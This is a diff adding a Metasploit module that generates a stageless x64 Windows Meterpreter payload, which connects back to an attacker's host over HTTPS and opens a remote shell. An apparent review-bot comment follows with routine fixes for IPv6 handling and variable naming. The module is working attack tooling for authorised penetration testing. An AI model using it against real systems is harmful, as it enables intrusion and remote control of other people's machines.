|
| 1 | +## |
| 2 | +# This module requires Metasploit: http://metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +require 'msf/core' |
| 7 | +require 'msf/core/handler/reverse_https' |
| 8 | +require 'msf/core/payload/windows/x64/stageless_meterpreter' |
| 9 | +require 'msf/base/sessions/meterpreter_x64_win' |
| 10 | +require 'msf/base/sessions/meterpreter_options' |
| 11 | +require 'rex/parser/x509_certificate' |
| 12 | + |
| 13 | +module Metasploit3 |
| 14 | + |
| 15 | + CachedSize = :dynamic |
| 16 | + |
| 17 | + include Msf::Payload::Windows::StagelessMeterpreter_x64 |
| 18 | + include Msf::Sessions::MeterpreterOptions |
| 19 | + include Msf::Payload::Windows::VerifySsl |
| 20 | + |
| 21 | + def initialize(info = {}) |
| 22 | + |
| 23 | + super(merge_info(info, |
| 24 | + 'Name' => 'Windows Meterpreter Shell, Reverse HTTPS Inline (x64)', |
| 25 | + 'Description' => 'Connect back to attacker and spawn a Meterpreter shell', |
| 26 | + 'Author' => [ 'OJ Reeves' ], |
| 27 | + 'License' => MSF_LICENSE, |
| 28 | + 'Platform' => 'win', |
| 29 | + 'Arch' => ARCH_X64, |
| 30 | + 'Handler' => Msf::Handler::ReverseHttps, |
| 31 | + 'Session' => Msf::Sessions::Meterpreter_x64_Win |
| 32 | + )) |
| 33 | + |
| 34 | + register_options([ |
| 35 | + OptString.new('EXTENSIONS', [false, "Comma-separated list of extensions to load"]), |
| 36 | + ], self.class) |
| 37 | + end |
| 38 | + |
| 39 | + def generate |
| 40 | + checksum = generate_uri_checksum(Handler::ReverseHttp::UriChecksum::URI_CHECKSUM_CONN) |
| 41 | + rand = Rex::Text.rand_text_alphanumeric(16) |
| 42 | + url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/#{checksum}_#{rand}/" |
| 43 | + |
| 44 | + generate_stageless_meterpreter(url) do |dll| |
| 45 | + |
| 46 | + # TODO: figure out this bit |
| 47 | + # patch the target ID into the URI if specified |
| 48 | + #if opts[:target_id] |
| 49 | + # i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00") |
| 50 | + # if i |
| 51 | + # t = opts[:target_id].to_s |
| 52 | + # raise "Target ID must be less than 5 bytes" if t.length > 4 |
| 53 | + # u = "/B#{t} HTTP/1.0\r\n\r\n\x00" |
| 54 | + # print_status("Patching Target ID #{t} into DLL") |
| 55 | + # dll[i, u.length] = u |
| 56 | + # end |
| 57 | + #end |
| 58 | + |
| 59 | + verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'], |
| 60 | + datastore['HandlerSSLCert']) |
| 61 | + |
| 62 | + Rex::Payloads::Meterpreter::Patch.patch_passive_service!(dll, |
| 63 | + :url => url, |
| 64 | + :ssl => true, |
| 65 | + :ssl_cert_hash => verify_cert_hash, |
| 66 | + :expiration => datastore['SessionExpirationTimeout'].to_i, |
| 67 | + :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, |
| 68 | + :ua => datastore['MeterpreterUserAgent'], |
| 69 | + :proxyhost => datastore['PROXYHOST'], |
| 70 | + :proxyport => datastore['PROXYPORT'], |
| 71 | + :proxy_type => datastore['PROXY_TYPE'], |
| 72 | + :proxy_username => datastore['PROXY_USERNAME'], |
| 73 | + :proxy_password => datastore['PROXY_PASSWORD']) |
| 74 | + end |
| 75 | + |
| 76 | + end |
| 77 | + |
| 78 | +end |
| 79 | + |
| 80 | + |
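Review bot: The URL built in `generate` interpolates `datastore['LHOST']` directly, so an IPv6 literal would yield `https://::1:4444/...` rather than the bracketed form the connect-back code would need; if IPv6 hosts are meant to be supported here, bracket the host before interpolation, e.g. `host = Rex::Socket.is_ipv6?(datastore['LHOST']) ? "[#{datastore['LHOST']}]" : datastore['LHOST']` and use `host` in the `url` string. The local `rand` on the next line shadows `Kernel#rand` for the rest of the method; a name such as `uri_suffix` reads better and avoids surprises if `rand(...)` is later called in this scope. The commented-out target-ID block inside the `generate_stageless_meterpreter` block references `opts[:target_id]`, but `generate` takes no arguments and defines no `opts`, so it cannot be uncommented as-is; either drop it or replace it with a one-line `# TODO: target-ID patching (needs an opts source)` so the intent is recorded without misleading dead code.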